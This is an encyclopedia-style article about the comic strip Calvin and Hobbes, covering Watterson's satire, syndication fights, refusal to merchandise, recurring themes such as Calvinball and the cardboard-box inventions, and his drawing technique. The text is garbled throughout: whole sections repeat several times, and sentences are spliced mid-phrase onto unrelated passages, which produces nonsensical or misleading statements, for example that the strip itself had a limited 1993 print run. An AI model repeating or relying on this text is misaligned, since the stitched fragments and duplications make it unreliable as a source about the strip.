In addition to his criticisms of art and academia, Watterson often used the strip to comment on American culture and society With rare exception, the strip avoids reference to actual people or events Watterson's commentary is therefore necessarily generalized He expresses frustration with public decadence and apathy, with commercialism, and with the pandering nature of the mass media Calvin is often seen "glued" to the television, while his father speaks with the voice of ascetic virtue, struggling to impart his values to Calvin

Watterson's vehicle for criticism is often Hobbes, who comments on Calvin's unwholesome habits from a more cynical perspective He is more likely to make a wry observation than actually intervene; he may merely watch as Calvin inadvertently makes the point himself In one instance, Calvin tells Hobbes about a science fiction story he has read in which machines turn humans into zombie slaves Hobbes makes a comment about the irony of machines controlling people instead of the other way around; Calvin then exclaims, "I'll say Hey! What time is it My TV show is on!" and sprints back inside to watch it

A Sunday, 21 June 1992 strip discussing the Big Bang coined the term "Horrendous Space Kablooie" for the event, a term which has achieved some tongue-in-cheek popularity among the scientific community, particularly in informal discussion and often shortened to "the HSK"

 Visual distortions

On several occasions, Watterson drew strips with strange visual distortions: inverted colors, objects turning "neo-cubist", or fantasy environments with other unusual physical phenomena Only Calvin is able to perceive these alterations, which seem to illustrate both his own shifting point of view and a typical six-year-old's wild imagination

In the Tenth Anniversary Book, Watterson explains that some of these strips were metaphors for his own experiences, illustrating, for example, his conflicts with his syndicate: a 1989 Sunday strip, normally in color, was drawn almost entirely in an inverted monochrome Calvin is accused by his father of seeing issues "in black and white"—an accusation sometimes leveled at Watterson regarding his refusal to license the strip—to which Calvin, echoing Watterson's own retort, replies, "Sometimes that's the way things are!"

 Passage of time

When the strips were originally published, Calvin's settings were seasonally appropriate for the Northern Hemisphere Calvin would be seen building snowmen or sledding during the period from November through February or so, and outside activities such as water balloon fights would replace school from June through August Christmas and Halloween strips were run during those times of year

Although Watterson depicts several years' worth of holidays, school years, summer vacations, and camping trips, and characters are aware of multiple "current" years such as "'94 model toboggans," "Vote Dad in '88," the '90s as the new decade, etc Calvin is never shown to age, pass to second grade, nor have any birthday celebrations The only birthday ever shown was that of Susie Derkins Such temporal distortions are fairly common among comic strips, as with the children in Peanuts, who existed without aging for decades Likewise, the characters in Krazy Kat celebrate the New Year but never grow old, and young characters like Ignatz Mouse's offspring never seem to grow up These uses of a floating timeline are very unlike series such as Gasoline Alley, Doonesbury and until 2007 For Better or For Worse, in which the characters age each year with their reading audience, get married, and have children

While Calvin does not grow older in the strip, reference is made in two strips—from November 17 and 18, 1995 ten years since the strip's debut—to Calvin having once been two and three years old and now feeling that "a lifetime of experience has left 

 Academic response

In her book When Toys Come Alive, Lois Rostow Kuznets discusses Calvin and Hobbes is an honor I'll long be proud of, and I've greatly appreciated your support and indulgence over the last decade Drawing this comic strip has been a privilege and a pleasure, and I thank you for giving me the opportunity

The 3,160th and final strip ran on Sunday, December 31, 1995

 Syndication and Watterson's artistic standards

From the outset, Watterson found himself at odds with the syndicate, which urged him to begin merchandising the characters and touring the country to promote the first collections of comic strips Watterson refused To him, the integrity of the strip and its artist would be undermined by commercialization, which he saw as a major negative influence in the world of cartoon art

Watterson also grew increasingly frustrated by the gradual shrinking of available space for comics in the newspapers He lamented that without space for anything more than simple dialogue or spare artwork, comics as an art form were becoming dilute, bland, and unoriginal

During Watterson's first sabbatical from the strip, Universal Press Syndicate will continue That so many newspapers would carry Calvin and Hobbes is an honor I'll long be proud of, and I've greatly appreciated your support and indulgence over the last decade Drawing this comic strip has been a privilege and a pleasure, and I thank you for giving me the opportunity

The 3,160th and final strip ran on Sunday, December 31, 1995

 Syndication and Watterson's artistic standards

From the outset, Watterson found himself at odds with the syndicate, which urged him to begin merchandising the characters and touring the country to promote the first collections of comic strips Watterson refused To him, the integrity of the strip and its artist would be undermined by commercialization, which he saw as a major negative influence in the world of cartoon art

Watterson also grew increasingly frustrated by the gradual shrinking of available space for comics in the newspapers He lamented that without space for anything more than simple dialogue or spare artwork, comics as an art form were becoming dilute, bland, and unoriginal

During Watterson's first sabbatical from the strip, Universal Press Syndicate continued to charge newspapers full price to re-run old Calvin and Hobbes strips Few editors approved of the move, but the strip was so popular that they had little choice but to continue to run it for fear that competing newspapers might pick it up and draw its fans away
This half-page layout can easily be rearranged for full, third, and quarter pages
This half-page layout can easily be rearranged for full, third, and quarter pages

Then, upon Watterson's return, Universal Press announced that Watterson had decided to sell his Sunday strip as an unbreakable half of a newspaper or tabloid page Many editors and even a few cartoonists, such as Bil Keane The Family Circus, criticized him for what they perceived as arrogance and an unwillingness to abide by the normal practices of the cartoon business—a charge that Watterson ignored Watterson had negotiated the deal to allow himself more creative freedom in the Sunday comics Prior to the switch, he had to have a certain number of panels with little freedom as to layout, because in different newspapers the strip would appear at a different width; afterwards, he was free to go with whatever graphic layout he wanted, however unorthodox His frustration with the standard space division requirements is evident in strips before the change; for example, a 1988 Sunday strip published before the deal is one large panel, but with all the action and dialogue in the bottom part of the panel so editors could crop the top part if they wanted to fit the strip into a smaller space Watterson's explanation for the switch:

    I took a sabbatical after resolving a long and emotionally draining fight to prevent Calvin and Hobbes from being merchandised Looking for a way to rekindle my enthusiasm for the duration of a new contract term, I proposed a redesigned Sunday format that would permit more panel flexibility To my surprise and delight, Universal responded with an offer to market the strip as an unbreakable half page more space than I'd dared to ask for, despite the expected resistance of editors To this day, my syndicate assures me that some editors liked the new format, appreciated the difference, and were happy to run the larger strip, but I think it's fair to say that this was not the most common reaction The syndicate had warned me to prepare for numerous cancellations of the Sunday feature, but after a few weeks of dealing with howling, purple-faced editors, the syndicate suggested that papers could reduce the strip to the size tabloid newspapers used for their smaller sheets of paper … I focused on the bright side: I had complete freedom of design and there were virtually no cancellations For all the yelling and screaming by outraged editors, I remain convinced that the larger Sunday strip gave newspapers a better product and made the comics section more fun for readers Comics are a visual medium A strip with a lot of drawing can be exciting and add some variety Proud as I am that I was able to draw a larger strip, I don't expect to see it happen again any time soon In the newspaper business, space is money, and I suspect most editors would still say that the difference is not worth the cost Sadly, the situation is a vicious circle: because there's no room for better artwork, the comics are simply drawn; because they're simply drawn, why should they have more room

Calvin and Hobbes remained extremely popular after the change and thus Watterson was able to expand his style and technique for the more spacious Sunday strips without losing carriers

 Merchandising

Bill Watterson is notable for his insistence that cartoon strips should stand on their own as an art form, and he has resisted the use of Calvin and Hobbes in merchandising of any sort This insistence stuck despite the fact that it could have generated millions of dollars per year in additional personal income Watterson explains in a 2005 press release:

    Actually, I wasn't against all merchandising when I started the strip, but each product I considered seemed to violate the spirit of the strip, contradict its message, and take me away from the work I loved If my syndicate had let it go at that, the decision would have taken maybe 30 seconds of my life

Watterson did ponder animating Calvin and Hobbes, and has expressed admiration for the art form In a 1989 interview in The Comics Journal, Watterson states:

    If you look at the old cartoons by Tex Avery and Chuck Jones, you'll see that there are a lot of things single drawings just can't do Animators can get away with incredible distortion and exaggeration    because the animator can control the length of time you see something The bizarre exaggeration barely has time to register, and the viewer doesn’t ponder the incredible license he's witnessed In a comic strip, you just show the highlights of action—you can't show the buildup and release    or at least not without slowing down the pace of everything to the point where it's like looking at individual frames of a movie, in which case you've probably lost the effect you were trying to achieve In a comic strip, you can suggest motion and time, but it's very crude compared to what an animator can do I have a real awe for good animation

After this he was asked if it was "a little scary to think of hearing Calvin's voice" He responded that it was "very scary," and that although he loved the visual possibilities of animation, the thought of casting voice actors to play his characters was uncomfortable He was also unsure whether he wanted to work with an animation team, as he had done all previous work by himself Ultimately, Calvin and Hobbes was never made into an animated series Watterson later stated in the "Calvin and Hobbes Tenth Anniversary Book, the books are "obviously none of these things"

Remaining books do contain some additional content; for instance, The Calvin and Hobbes Lazy Sunday Book contains a long watercolor Spaceman Spiff epic not seen elsewhere until Complete, and The Calvin and Hobbes Tenth Anniversary Book" that he liked the fact that his strip was a "low-tech, one-man operation," and took great pride in the fact that he drew every line and wrote every word on his own

Except for the books, two 16-month calendars 1988–1989 and 1989–1990, the textbook Teaching with Calvin and Hobbes was published in a limited single print-run in 1993 The book includes various Calvin and Hobbes strips together with lessons and questions to follow, such as, "What do you think the principal meant when he said they had quite a file on Calvin" 108 The book is very rare and increasingly sought by collectors antics

The strip primarily focuses on Calvin, Hobbes, and the above mentioned secondary characters Other characters who have appeared in multiple storylines include Calvin's family doctor whom Calvin frequently gives a hard time during his check-ups, the barber, and the extraterrestrials Galaxoid and Nebular

Calvin imagines himself as a great many things, including dinosaurs, elephants, jungle-farers and superheroes Four of his alter egos are well-defined and recurring: As "Stupendous Man", he pictures himself as a superhero in disguise, wearing a mask and a cape made by his mother, and narrating his own adventures Stupendous Man almost always "suffers defeat" to his opponent, usually Calvin's mother "Spaceman Spiff" is a heroic spacefarer As Spiff, Calvin battles aliens typically his parents or teacher and travels to distant planets his house, school, or neighborhood "Tracer Bullet," a hardboiled private eye, says he has eight slugs in him: "one's lead, and the rest are bourbon" In one story, Bullet is called to a case, in which a "pushy dame" Calvin's mother accuses him of destroying an expensive lamp broken as a result of an indoor football game between Calvin and Hobbes When Calvin imagines himself as a dinosaur, he is usually either a Tyrannosaurus rex, or an Allosaurus When Calvin daydreams about being these alter egos during school, Miss Wormwood often whacks his desk with a pointer to shock him back to attention

There are several repeating themes in the work, a few involving Calvin's real life, and many stemming from his imagination Some of the latter are clearly flights of fantasy, while others, like Hobbes, are of an apparently dual nature and do not quite work when presumed real or unreal

Over the years Calvin has had several adventures involving corrugated cardboard boxes which he adapts for many different uses Some of his many uses of cardboard boxes include:

     Transmogrifier
     Flying time machine
     Duplicator with ethicator enhancement
     Atomic Cerebral Enhance-O-Tron
     Emergency GROSS meeting "box of secrecy"
     A stand for selling things, such as "lemonade"

Building the Transmogrifier is accomplished by turning a cardboard box upside-down, attaching an arrow to the side and writing a list of choices on the box to turn into anything not stated on the box, the name is written on the remaining space Upon turning the arrow to a particular choice and pushing a button, the transmogrifier instantaneously rearranges the subject's "chemical configuration" accompanied by a loud zap

The Duplicator is also made from a cardboard box, turned on its side Instead of the transmogrifier's "zap" sound, it makes a "boink" The title of one of the collections, "Scientific Progress Goes 'Boink'", quotes a phrase that Hobbes utters upon hearing the Duplicator in operation The Duplicator produces copies of Calvin, which initially turn out to be as problematic and independent as Calvin

The Time Machine is also made from the same box, this time with its open side up Passengers climb into the open top, and must be wearing protective goggles while in time-warp Calvin first intends to travel to the future and obtain future technology that he could use to become rich in the present time Unfortunately, he faces the wrong way as he steers and ends up in prehistoric times

The Atomic Cerebral Enhance-O-Tron is also fashioned from the same cardboard box, turned upside-down, but with three strings attached to it which are used for input, output, and grounding; the grounding string functions like a lightning rod for brainstorms so Calvin can keep his ideas "grounded in reality" The strings are tied to a metal colander, which is worn on the head When used, the wearer of the cap receives a boost in intelligence, and his head becomes enlarged The intelligence boost, however, is temporary When it wears off, the subject's head reverts to its normal size Calvin creates the Cerebral Enhance-O-Tron in order to be able to come up with a topic for his homework

Other kids' games are all such a bore!
They've gotta have rules and they gotta keep score!
Calvinball is better by far!
It's never the same! It's always bizarre!
You don't need a team or a referee!
You know that it's great, 'cause it's named after me!

Calvinball is a game played by Calvin and Hobbes as a rebellion against organized team sports; according to Hobbes, "No sport is less organized than Calvinball!"

The only consistent rule is that Calvinball may never be played with the same rules twice Calvinball is essentially a game of wits and creativity rather than stamina or athletic skill, a prominent nomic self-modifying game, and one where Hobbes usually outwits Calvin himself

Calvin and Hobbes frequently ride downhill in a wagon, sled, or toboggan, depending on the season, as a device to add some physical comedy to the strip and because, according to Watterson, "it's a lot more interesting 

During winter, Calvin often engages in snowball fights with Hobbes or Susie, who frequently best him due to their own wit or Calvin's unreliable aim Calvin is attentive to the craft of making a good snowball or slushball, but his delight in hitting Susie in the back of the head with a well-aimed snowball is often tempered by his anxiousness to remain on Santa's "good" list at Christmas time

Calvin is also very talented and creative at building snowmen, but he usually puts them in scenes that depict the snowmen dying or suffering in grotesque ways In one scene Calvin builds a row of saluting snowmen as a means to humiliate his dad as he returns from work "He knows I hate this," says his father as he proceeds up the front walk In another, to retaliate Susie's creation of a "snowwoman", he decides to create an "anatomically correct" snowman in the front yard His creations tend to alarm his parents due to their macabre nature In a notable storyline, Calvin builds a snowman and brings it to life in a manner reminiscent of Frankenstein's monster, and which proceeds to create more of its own kind This storyline gave the title to the Calvin and Hobbes book Attack of the Deranged Mutant Killer Monster Snow Goons Those Sunday strips were never reprinted in color until the Complete collection was finally published in 2005 Every book since Snow Goons has been printed in a larger format with Sundays in color and weekday and Saturday strips larger than they appeared in most newspapers Watterson also claims he named the books the "Essential, Authoritative, and Indispensable, except for the contents of Attack of the Deranged Mutant Killer Monster Snow Goons Those Sunday strips were never reprinted in color until the Complete collection was finally published in 2005 Every book since Snow Goons has been printed in a larger format with Sundays in color and weekday and Saturday strips larger than they appeared in most newspapers Watterson also claims he named the books the "Essential, Authoritative, and Indispensable, except for the contents of Attack of the Deranged Mutant Killer Monster Snow Goons, after the name Calvin gives to the first creature and its compatriots in the story

Calvin, unlike Hobbes, thinks of snowmen as fine art, worthy of highbrow criticism and expensive pricing Bill Watterson has said that this is a parody of art's "pretentious blowhards"

Calvin is confronted every year with Christmas, as his mischievous nature conflicts with his greed for presents from Santa Claus which requires that he behave Calvin frets continually during the Christmas season, sometimes devising strategy by which to fool Santa Claus into giving him gifts Calvin's list of desired "loot," as he terms Christmas presents, is implied to include "incendiary weapons", of which some examples are given atom bombs, torpedoes, a heat-seeking guided missile, grenade launcher, etc in dialogue Most Christmas sequences of strips depict Calvin's parents playing the role of Santa Claus by secretly placing presents beneath the Christmas Tree or in Calvin's stocking; however, one later Sunday strip depicted Santa Claus discussing Calvin's list and history with one of his assistants, although the "reality" of this is left undefined Occasionally, a Christmas strip depicts some kindness shown by Calvin to Hobbes, as if to comment on the morals perceived as being part of the Christmas holiday One Sunday strip appeared as a poem entitled "Christmas Eve", featuring a described scene of Calvin sleeping beside Hobbes between the Christmas Tree and a fire

GROSS is Calvin's secret club, whose sole purpose is to exclude girls generally, and Susie Derkins specifically The name is an acronym that stands for Get Rid Of Slimy girlS Calvin admits "slimy girls" is a bit redundant, as all girls are slimy, "but otherwise it doesn't spell anything" GROSS is headquartered in a tree house Hobbes can climb up to the tree house, but Calvin requires a rope Hobbes refuses to drop down the rope until Calvin has said the password, which is an ode to tigers that is over eight verses long and occasionally accompanied by a dance Calvin and Hobbes are its only members, and each takes up multiple official titles while wearing newspaper chapeaux during meetings Most commonly, Calvin's title is Dictator-For-Life, and Hobbes is President and First Tiger The club has an anthem, but most of its words are unknown to outsiders Calvin often awards badges, promotions, etc, such as "Bottle Caps of Valor" Many GROSS plans to annoy or otherwise attack Susie end in failure, while many meetings end in a Calvinball-style battle of rule changes or promotion granting, before degenerating into a brawl

Both the Noodle Incident and the book Hamster Huey and the Gooey Kablooie are mentioned several times in passing, but Watterson left the details to the reader's imagination "where 

More details are given regarding Hamster Huey and the Gooey Kablooie were left to the reader's imagination, where Watterson was sure they would be “more outrageous” than he could portray

Watterson's technique started with minimalist pencil sketches drawn with a light pencil though the larger Sunday strips often required more elaborate work; he then would use a small sable brush and India ink on the Strathmore bristol board to complete most of the remaining drawing He also letters dialogue with a Rapidograph fountain pen, and he uses a crowquill pen for odds and ends He whites out the mistakes with Liquid Paper He was careful in his use of color, often spending a great deal of time in choosing the right colors to employ for the weekly Sunday strip When Calvin and Hobbes started, there were 64 colors available for the Sunday strips For the later Sunday strips, Watterson had 125 colors, as well as the ability to fade the colors into each other

 Art and academia

Watterson used the strip to criticize the artistic world, principally through Calvin's unconventional creations of snowmen but also through other expressions of childhood art When Miss Wormwood complains that he is wasting class time drawing incomprehensible things a Stegosaurus in a rocket ship, for example, Calvin proclaims himself "on the cutting edge of the avant-garde" He begins exploring the medium of snow when a warm day melts his snowman His next sculpture "speaks to the horror of our own mortality, inviting the viewer to contemplate the evanescence of life" In further strips, Calvin's creative instincts diversify to include sidewalk drawings or as he terms them, examples of "suburban postmodernism"

Watterson also lampooned the academic world In one example, Calvin writes a "revisionist autobiography", recruiting Hobbes to take pictures of him doing stereotypical kid activities like playing sports in order to make him seem more well-adjusted In another strip, he carefully crafts an "artist's statement," claiming that such essays convey more messages than artworks themselves ever do Hobbes blandly notes "You misspelled Weltanschauung" He indulges in what Watterson calls "pop psychobabble" to justify his destructive rampages and shift blame to his parents, citing "toxic codependency" In one instance, he pens a book report based on the theory that the purpose of academic scholarship is to "inflate weak ideas, obscure poor reasoning, and inhibit clarity," entitled The Dynamics of Interbeing and Monological Imperatives in Dick and Jane: A Study in Psychic Transrelational Gender Modes Displaying his creation to Hobbes, he remarks, "Academia, here I come!" Watterson explains that he adapted this jargon and similar examples from several other strips from an actual book of art criticism

Overall, Watterson's satirical essays serve to attack both sides, criticizing both the commercial mainstream and the artists who are supposed to be "outside" it Not long after he began drawing his "Dinosaurs In Rocket Ships" series, Calvin tells Hobbes:

    The hard part for us avant-garde post-modern artists is deciding whether or not to embrace commercialism Do we allow our work to be hyped and exploited by a market that's simply hungry for the next new thing Do we participate in a system that turns high art into low art so it's better suited for mass consumption Of course, when an artist goes commercial, he makes a mockery of his status as an outsider and free thinker He buys into the crass and shallow values art should transcend He trades the integrity of his art for riches and fame Oh, what the heck I'll do it

 Social criticisms

In addition to his criticisms of art and academia, Watterson often used the strip to comment on American culture and society With rare exception, the strip avoids reference to actual people or events Watterson's commentary is therefore necessarily generalized He expresses frustration with public decadence and apathy, with commercialism, and with the pandering nature of the mass media Calvin is often seen "glued" to the television, while his father speaks with the voice of ascetic virtue, struggling to impart his values to Calvin

Watterson's vehicle for criticism is often Hobbes, who comments on Calvin's unwholesome habits from a more cynical perspective He is more likely to make a wry observation than actually intervene; he may merely watch as Calvin inadvertently makes the point himself In one instance, Calvin tells Hobbes about a science fiction story he has read in which machines turn humans into zombie slaves Hobbes makes a comment about the irony of machines controlling people instead of the other way around; Calvin then exclaims, "I'll say Hey! What time is it My TV show is on!" and sprints back inside to watch it

A Sunday, 21 June 1992 strip discussing the Big Bang coined the term "Horrendous Space Kablooie" for the event, a term which has achieved some tongue-in-cheek popularity among the scientific community, particularly in informal discussion and often shortened to "the HSK"

 Visual distortions

On several occasions, Watterson drew strips with strange visual distortions: inverted colors, objects turning "neo-cubist", or fantasy environments with other unusual physical phenomena Only Calvin is able to perceive these alterations, which seem to illustrate both his own shifting point of view and a typical six-year-old's wild imagination

In the Tenth Anniversary Book" that he liked the fact that his strip was a "low-tech, one-man operation," and took great pride in the fact that he drew every line and wrote every word on his own

Except for the books, two 16-month calendars 1988–1989 and 1989–1990, the textbook Teaching with Calvin and Hobbes was published in a limited single print-run in 1993 The book includes various Calvin and Hobbes strips together with lessons and questions to follow, such as, "What do you think the principal meant when he said they had quite a file on Calvin" 108 The book is very rare and increasingly sought by collectorsiginal

During Watterson's first sabbatical from the strip, Universal Press Syndicate will continue That so many newspapers would carry Calvin and Hobbes is an honor I'll long be proud of, and I've greatly appreciated your support and indulgence over the last decade Drawing this comic strip has been a privilege and a pleasure, and I thank you for giving me the opportunity

The 3,160th and final strip ran on Sunday, December 31, 1995

 Syndication and Watterson's artistic standards

From the outset, Watterson found himself at odds with the syndicate, which urged him to begin merchandising the characters and touring the country to promote the first collections of comic strips Watterson refused To him, the integrity of the strip and its artist would be undermined by commercialization, which he saw as a major negative influence in the world of cartoon art

Watterson also grew increasingly frustrated by the gradual shrinking of available space for comics in the newspapers He lamented that without space for anything more than simple dialogue or spare artwork, comics as an art form were becoming dilute, bland, and unoriginal

During Watterson's first sabbatical from the strip, Universal Press Syndicate continued to charge newspapers full price to re-run old Calvin and Hobbes strips Few editors approved of the move, but the strip was so popular that they had little choice but to continue to run it for fear that competing newspapers might pick it up and draw its fans away
This half-page layout can easily be rearranged for full, third, and quarter pages

Then, upon Watterson's return, Universal Press announced that Watterson had decided to sell his Sunday strip as an unbreakable half page more space than I'd dared to ask for, despite the expected resistance of editors To this day, my syndicate assures me that some editors liked the new format, appreciated the difference, and were happy to run the larger strip, but I think it's fair to say that this was not the most common reaction The syndicate had warned me to prepare for numerous cancellations of the Sunday feature, but after a few weeks of dealing with howling, purple-faced editors, the syndicate suggested that papers could reduce the strip to the size tabloid newspapers used for their smaller sheets of paper … I focused on the bright side: I had complete freedom of design and there were virtually no cancellations For all the yelling and screaming by outraged editors, I remain convinced that the larger Sunday strip gave newspapers a better product and made the comics section more fun for readers Comics are a visual medium A strip with a lot of drawing can be exciting and add some variety Proud as I am that I was able to draw a larger strip, I don't expect to see it happen again any time soon In the newspaper business, space is money, and I suspect most editors would still say that the difference is not worth the cost Sadly, the situation is a vicious circle: because there's no room for better artwork, the comics are simply drawn; because they're simply drawn, why should they have more room

Calvin and Hobbes remained extremely popular after the change and thus Watterson was able to expand his style and technique for the more spacious Sunday strips without losing carriers

 Merchandising

Bill Watterson is notable for his insistence that cartoon strips should stand on their own as an art form, and he has resisted the use of Calvin and Hobbes in merchandising of any sort This insistence stuck despite the fact that it could have generated millions of dollars per year in additional personal income Watterson explains in a 2005 press release:

    Actually, I wasn't against all merchandising when I started the strip, but each product I considered seemed to violate the spirit of the strip, contradict its message, and take me away from the work I loved If my syndicate had let it go at that, the decision would have taken maybe 30 seconds of my life

Watterson did ponder animating Calvin and Hobbes, and has expressed admiration for the art form In a 1989 interview in The Comics Journal, Watterson states:

    If you look at the old cartoons by Tex Avery and Chuck Jones, you'll see that there are a lot of things single drawings just can't do Animators can get away with incredible distortion and exaggeration    because the animator can control the length of time you see something The bizarre exaggeration barely has time to register, and the viewer doesn’t ponder the incredible license he's witnessed In a comic strip, you just show the highlights of action—you can't show the buildup and release    or at least not without slowing down the pace of everything to the point where it's like looking at individual frames of a movie, in which case you've probably lost the effect you were trying to achieve In a comic strip, you can suggest motion and time, but it's very crude compared to what an animator can do I have a real awe for good animation

After this he was asked if it was "a little scary to think of hearing Calvin's voice" He responded that it was "very scary," and that although he loved the visual possibilities of animation, the thought of casting voice actors to play his characters was uncomfortable He was also unsure whether he wanted to work with an animation team, as he had done all previous work by himself Ultimately, Calvin and Hobbes was published in a limited single print-run in 1993 The book includes various Calvin and Hobbes strips Few editors approved of the move, but the strip was so popular that they had little choice but to continue to run it for fear that competing newspapers might pick it up and draw its fans away
This half-page layout can easily be rearranged for full, third, and quarter pages

Then, upon Watterson's return, Universal Press announced that Watterson had decided to sell his Sunday strip as an unbreakable half page more space than I'd dared to ask for, despite the expected resistance of editors To this day, my syndicate assures me that some editors liked the new format, appreciated the difference, and were happy to run the larger strip, but I think it's fair to say that this was not the most common reaction The syndicate had warned me to prepare for numerous cancellations of the Sunday feature, but after a few weeks of dealing with howling, purple-faced editors, the syndicate suggested that papers could reduce the strip to the size tabloid newspapers used for their smaller sheets of paper … I focused on the bright side: I had complete freedom of design and there were virtually no cancellations For all the yelling and screaming by outraged editors, I remain convinced that the larger Sunday strip gave newspapers a better product and made the comics section more fun for readers Comics are a visual medium A strip with a lot of drawing can be exciting and add some variety Proud as I am that I was able to draw a larger strip, I don't expect to see it happen again any time soon In the newspaper business, space is money, and I suspect most editors would still say that the difference is not worth the cost Sadly, the situation is a vicious circle: because there's no room for better artwork, the comics are simply drawn; because they're simply drawn, why should they have more room

Calvin and Hobbes remained extremely popular after the change and thus Watterson was able to expand his style and technique for the more spacious Sunday strips without losing carriers

 Merchandising

Bill Watterson is notable for his insistence that cartoon strips should stand on their own as an art form, and he has resisted the use of Calvin and Hobbes in merchandising of any sort This insistence stuck despite the fact that it could have generated millions of dollars per year in additional personal income Watterson explains in a 2005 press release:

    Actually, I wasn't against all merchandising when I started the strip, but each product I considered seemed to violate the spirit of the strip, contradict its message, and take me away from the work I loved If my syndicate had let it go at that, the decision would have taken maybe 30 seconds of my life

Watterson did ponder animating Calvin and Hobbes, and has expressed admiration for the art form In a 1989 interview in The Comics Journal, Watterson states:

    If you look at the old cartoons by Tex Avery and Chuck Jones, you'll see that there are a lot of things single drawings just can't do Animators can get away with incredible distortion and exaggeration    because the animator can control the length of time you see something The bizarre exaggeration barely has time to register, and the viewer doesn’t ponder the incredible license he's witnessed In a comic strip, you just show the highlights of action—you can't show the buildup and release    or at least not without slowing down the pace of everything to the point where it's like looking at individual frames of a movie, in which case you've probably lost the effect you were trying to achieve In a comic strip, you can suggest motion and time, but it's very crude compared to what an animator can do I have a real awe for good animation

After this he was asked if it was "a little scary to think of hearing Calvin's voice" He responded that it was "very scary," and that although he loved the visual possibilities of animation, the thought of casting voice actors to play his characters was uncomfortable He was also unsure whether he wanted to work with an animation team, as he had done all previous work by himself Ultimately, Calvin and Hobbes was never made into an animated series Watterson later stated in the "Calvin and Hobbes Tenth Anniversary Book contains much original commentary from Watterson Calvin and Hobbes: Sunday Pages 1985–1995 contains 36 Sunday strips in color alongside Watterson's original sketches, prepared for an exhibition at The Ohio State University Cartoon Research Library

An officially licensed children's textbook entitled Teaching with Calvin and Hobbes,

 Style and influences

Calvin and Hobbes strips together with lessons and questions to follow, such as, "What do you think the principal meant when he said they had quite a file on Calvin" 108 The book is very rare and increasingly sought by collectors antics

The strip primarily focuses on Calvin, Hobbes, and the above mentioned secondary characters Other characters who have appeared in multiple storylines include Calvin's family doctor whom Calvin frequently gives a hard time during his check-ups, the barber, and the extraterrestrials Galaxoid and Nebular

Calvin imagines himself as a great many things, including dinosaurs, elephants, jungle-farers and superheroes Four of his alter egos are well-defined and recurring: As "Stupendous Man", he pictures himself as a superhero in disguise, wearing a mask and a cape made by his mother, and narrating his own adventures Stupendous Man almost always "suffers defeat" to his opponent, usually Calvin's mother "Spaceman Spiff" is a heroic spacefarer As Spiff, Calvin battles aliens typically his parents or teacher and travels to distant planets his house, school, or neighborhood "Tracer Bullet," a hardboiled private eye, says he has eight slugs in him: "one's lead, and the rest are bourbon" In one story, Bullet is called to a case, in which a "pushy dame" Calvin's mother accuses him of destroying an expensive lamp broken as a result of an indoor football game between Calvin and Hobbes When Calvin imagines himself as a dinosaur, he is usually either a Tyrannosaurus rex, or an Allosaurus When Calvin daydreams about being these alter egos during school, Miss Wormwood often whacks his desk with a pointer to shock him back to attention

There are several repeating themes in the work, a few involving Calvin's real life, and many stemming from his imagination Some of the latter are clearly flights of fantasy, while others, like Hobbes, are of an apparently dual nature and do not quite work when presumed real or unreal

Over the years Calvin has had several adventures involving corrugated cardboard boxes which he adapts for many different uses Some of his many uses of cardboard boxes include:

     Transmogrifier
     Flying time machine
     Duplicator with ethicator enhancement
     Atomic Cerebral Enhance-O-Tron
     Emergency GROSS meeting "box of secrecy"
     A stand for selling things, such as "lemonade"

Building the Transmogrifier is accomplished by turning a cardboard box upside-down, attaching an arrow to the side and writing a list of choices on the box to turn into anything not stated on the box, the name is written on the remaining space Upon turning the arrow to a particular choice and pushing a button, the transmogrifier instantaneously rearranges the subject's "chemical configuration" accompanied by a loud zap

The Duplicator is also made from a cardboard box, turned on its side Instead of the transmogrifier's "zap" sound, it makes a "boink" The title of one of the collections, "Scientific Progress Goes 'Boink'", quotes a phrase that Hobbes utters upon hearing the Duplicator in operation The Duplicator produces copies of Calvin, which initially turn out to be as problematic and independent as Calvin

The Time Machine is also made from the same box, this time with its open side up Passengers climb into the open top, and must be wearing protective goggles while in time-warp Calvin first intends to travel to the future and obtain future technology that he could use to become rich in the present time Unfortunately, he faces the wrong way as he steers and ends up in prehistoric times

The Atomic Cerebral Enhance-O-Tron is also fashioned from the same cardboard box, turned upside-down, but with three strings attached to it which are used for input, output, and grounding; the grounding string functions like a lightning rod for brainstorms so Calvin can keep his ideas "grounded in reality" The strings are tied to a metal colander, which is worn on the head When used, the wearer of the cap receives a boost in intelligence, and his head becomes enlarged The intelligence boost, however, is temporary When it wears off, the subject's head reverts to its normal size Calvin creates the Cerebral Enhance-O-Tron in order to be able to come up with a topic for his homework

Other kids' games are all such a bore!
They've gotta have rules and they gotta keep score!
Calvinball is better by far!
It's never the same! It's always bizarre!
You don't need a team or a referee!
You know that it's great, 'cause it's named after me!

Calvinball is a game played by Calvin and Hobbes as a rebellion against organized team sports; according to Hobbes, "No sport is less organized than Calvinball!"

The only consistent rule is that Calvinball may never be played with the same rules twice Calvinball is essentially a game of wits and creativity rather than stamina or athletic skill, a prominent nomic self-modifying game, and one where Hobbes usually outwits Calvin himself

Calvin and Hobbes frequently ride downhill in a wagon, sled, or toboggan, depending on the season, as a device to add some physical comedy to the strip and because, according to Watterson, "it's a lot more interesting 

During winter, Calvin often engages in snowball fights with Hobbes or Susie, who frequently best him due to their own wit or Calvin's unreliable aim Calvin is attentive to the craft of making a good snowball or slushball, but his delight in hitting Susie in the back of the head with a well-aimed snowball is often tempered by his anxiousness to remain on Santa's "good" list at Christmas time

Calvin is also very talented and creative at building snowmen, but he usually puts them in scenes that depict the snowmen dying or suffering in grotesque ways In one scene Calvin builds a row of saluting snowmen as a means to humiliate his dad as he returns from work "He knows I hate this," says his father as he proceeds up the front walk In another, to retaliate Susie's creation of a "snowwoman", he decides to create an "anatomically correct" snowman in the front yard His creations tend to alarm his parents due to their macabre nature In a notable storyline, Calvin builds a snowman and brings it to life in a manner reminiscent of Frankenstein's monster, and which proceeds to create more of its own kind This storyline gave the title to the Calvin and Hobbes book Attack of the Deranged Mutant Killer Monster Snow Goons, after the name Calvin gives to the first creature and its compatriots in the story

Calvin, unlike Hobbes, thinks of snowmen as fine art, worthy of highbrow criticism and expensive pricing Bill Watterson has said that this is a parody of art's "pretentious blowhards"

